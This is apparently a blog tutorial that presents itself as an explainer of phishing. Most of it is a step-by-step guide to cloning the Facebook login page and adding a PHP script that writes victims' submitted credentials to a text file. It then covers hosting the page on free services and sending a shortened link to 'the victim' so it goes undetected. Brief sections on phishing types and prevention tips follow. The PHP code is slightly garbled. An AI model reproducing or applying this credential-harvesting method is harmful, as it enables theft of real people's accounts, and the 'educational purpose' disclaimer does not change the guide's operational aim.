What is Phishing? Phishing Attack and How it works?

Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Log in Pages, also known as spoofed pages. In this post, you will learn about what is phishing, phishing attack, types, and techniques, how we can prevent such attacks, and phishing Facebook pages.

You Can Also Read

What is Phishing?

It is the most common method used by hackers to hack accounts and an example of social engineering techniques that are used to deceive users. A phishing attack can be used to hack any type of accounts (almost most of the accounts can be hacked using this technique).

Phishing is a fraud and illegal activity used to obtain some bank account credentials, social account username, email address and passwords, credit card and many more fraud activities.

Hackers create a fake phishing page that looks like the original official website and due to this many people enter their information.

Hackers mainly use email messages, Instant messaging platforms like Facebook, WhatsApp, WeChat, Hike, etc. to send the links for hacking your passwords.

In a survey, It is found that phishing is one of the most common techniques used by hackers to hack accounts and the success rate of this technique is high. But nowadays people are getting aware of this techniques but we need to update ourselves from time to time from the latest hacking methods.

Suggested: Increase real Instagram followers using this tool for free

Phishing Attack

The phishing attack is one of the dangerous fraud activities that can steal your important and sensitive information such as credit cards, social accounts, website admin passwords, etc.

A phishing attack can be used for different purposes like hacking facebook account, Instagram account, credit card numbers, bank account information, and for many other purposes.

Facebook phishing scams are widely used and it is the easiest method of hacking someone’s account. These fake login pages look like the original login pages of sites like Yahoo, Gmail, MySpace, etc. The victim is fooled to believe the fake Facebook page to be the real one and enter his/her password. But once the user attempts to log in through these pages,  his/her Facebook login details are stolen away.

You can make any type of phishing login page to hack facebook using phishing. It is a criminal offense and illegal activity so don’t try to anyone. You can try this on your own account or system to learn this technique but do not try it on anyone else.

Suggested: WiFi hacking complete tutorial guide – Hack nearby WiFi password using this tool

How to use it to hack anyone

I have explained how to create a phishing page and use it to hack facebook account. You can create fake pages of any websites and they will look like the original one.

When your fake page is created. You can host this page on a free hosting provider or on a paid hosting provider. When your file is successfully hosted on the server then your phishing page is completed. You can copy the link and send it to your friends or anyone to hack the username and passwords.

Send this link on Gmail, Facebook, Whatsapp, WeChat, etc. When someone opens this link and enters his/her username and password. You will get all the information in your cPanel of the hosted file.

Hack Facebook Using Phishing

Follow The Given Steps and by using these you can also hack Gmail, Yahoo, or any other account. These steps include all the details for creating a Facebook phishing site (facebook phishing page) and how to use it to hack facebook account. If you want to save your time you can check this website. This website has pre-generated links so, you do not need to create any phishing page. Just use the links of this website to send to anyone and hack facebook using phishing.

Suggested: Change IMEI Number of any android phone (complete guide)

Step 1

To hack facebook using phishing, first of all, go to the Facebook and then right-click on the blank area, you will see the option view source page simply click on that.

phishing facebook

Suggested: View Instagram stories anonymously without knowing her/him

Step 2

Now a tab will open which will contain source code of the Facebook login page.

phishing attack

Suggested: mSpy monitor someone phone Activities from your phone

Step 3

select all code and copy all code then paste it into notepad.

what is phishing

Suggested: 10 Internet Security Tips You Must Know To Keep Safe Browsing

Step 4

When source code is pasted in notepad after that press Ctrl+F and type action in notepad.

Suggested Topic: How to Secure and Prevent Android phone from Hacking

Step 5

you will have to search again and again till you have found a text which looks like


hack facebook using phishing

Suggested: 8 Sites Like Craigslist Personals – Find new people and meet them

Step 6

After that delete all the text written in green and instead of writing it Post.php. After that, it will look like action=”post.php”

Suggested: How Do You Know If Someone Blocked Your Number?

Step 7

Save it on your desktop or in any hard drive storage with the name index.htm and yes remember not as index.html as many times people save it as index.html.

you have completely made your phishing page which will look like as given in the pic below

Step 8

Now you need to create a php file for this Open a new notepad and copy the code given below and save it with the name post.php.

header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
write($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
fwrite($handle, “\r\n”);

you have successfully created two files 1. index.htm and 2. post.php

Step 9

You need to upload these two files in a free web hosting site to hack facebook using phishing. Some best web hosting site which is useful for you. you need to make an account on any of one below web hosting site.

  1. www.my3gb.com
  2. Hostinger
  3. www.000webhost.com
  4. Freehosting

I prefer www.000webhost.com

phishing link

Step 10

Now you have to sign up simply fill all required information in the registration form. When your account completely setup simply log in with your username and password.

phishing techniques

Step 11

Open Cpanel (control panel) then click on file manager, after that a new window will pop up. Now go to public_html.


Read Also: 2 Ways to download facebook video – Facebook Video Downloader Guide

Step 12

Most of the individuals made mistake in these last 3-4 steps so read each step carefully. Delete the file named default.php after that you need to upload index.htm and post.php file click on upload files button and upload both files one by one. Now click on index.htm which will look like the same as that of the original Facebook page. this is your phishing page.

hack facebook using phishing

Suggested topic: Instahax0r – Hack Anyone Instagram ID and Password

Step 13

This is the last step of hack Facebook using phishing. Copy URL of that page and send this link to the victim on Facebook, Gmail, or wherever you want, when victim open that link he sees a fake Facebook page that looks real and enters their username and password and hit log in his password, the page redirects connect to Facebook and you will able to see his/her password by going into account  000webhost.com and go to file manager and then public_html here you will find a new file as username.txt. Before sending this link to anyone shorten its URL first which may help you to undetected by Facebook. You have successfully read this post to hack Facebook using Phishing. This is the method for phishing Facebook passwords.

Read AlsoStressthem.to – Free IP Stresser Service And Alternatives In 2021

Types & Techniques of Phishing

Types and techniques that are commonly used in this type of attack.

Social engineering

In this technique, users can be encouraged to open attachments or links send to their email address or on instant messaging. When users open this link or attachment they got infected by a virus or hacked.

Clone phishing

Clone phishing is a kind of phishing attack whereby a genuine, and recently conveyed, an email containing a attachments/link has its substance and beneficiary address taken and used to make a practically indistinguishable or cloned email.

The link inside the email is supplanted with a malevolent form and after that sent from an email address parodied to seem to originate from the first sender.

It might profess to be a resend of the first or a refreshed variant to the first. This strategy could be utilized to turn from a recently tainted machine and addition and a dependable balance on another machine, by abusing the social trust related to the induced association because of the two gatherings accepting the first email.

Voice phishing

Voice phishing is a good example that not all phishing attack requires to create a fake page of a website to get users password and email ID. In this phishing attack, hackers sent a message to your phone that claims to be from the bank, in which it says that you have some problems related to the bank account and you need to dial a customer number (customer number will be given in your message) to fix the problem.

But this message does not belong to the official bank. It is a trap to get your account bank number and password. When the user dials this number (hackers number which users may think official bank number), Hackers told users to enter their account numbers and PIN.

This type of phishing attack is called voice phishing. This phishing attack is done using VOIP.

Suggested: 3 techniques to hide Your IP Address

Spear phishing

In this phishing attack, hackers target specific individuals by collecting personal information and data of the individuals to increase their chances of success.

Other techniques

  • Link manipulation
  • Whaling

Suggested: 10 Best educational apps for students – Learning apps to Learn new things

How to prevent Phishing attack

1. Unknown mails

Do not open unknown email messages or links.

2. Attachments

Do not click or download any unknown attachment send by someone in your mail. If you know that the file is safe then you can open it.

3. Two-Step Verification (2-Step Verification)

Always use 2 step verification for all of your accounts such as Gmail, Facebook, WhatsApp. Two-step verification protects you from hackers. Even if they successfully hacked your account they can’t log in to your account. They need to enter the digit code which will be sent on your phone.

4. Antivirus

Use good antivirus software, It can help you to protect all your sensitive information by detecting the virus, fraud links, phishing attack, ransomware attack, etc.

Antivirus also protects you when you are doing some online activities. If the antivirus found some potentially dangerous websites that can steal your information. It will automatically block such websites and files from the Internet.

5. Check the URL

Check the URL of the website before entering any information. A phishing page will look like a real one but you can easily identify them by checking the URL.

6. Do not share OTP

Do not share your bank OTP with anyone or do not enter any sensitive information such as bank account number and password over the voice call.

7. Game links

If your friend sends you a link and invited to play a game then before entering any information check that the link URL is real or fake one.

8. Do not login to your social media accounts using Email links

Do not log in to your account social media account using the mail message as it can be a hacking link to trick you and get your password.

You can find more tips to prevent yourself from hacking.

See Also:

phishing is a criminal offense and illegal activity so don’t try to anyone. This tutorial is for educational purpose.

For any help, you can leave a message on the Facebook page.

Share this

8 thoughts on “What is Phishing? Phishing Attack and How it works?”

Leave a Comment

For security, use of Google's reCAPTCHA service is required which is subject to the Google Privacy Policy and Terms of Use.

I agree to these terms.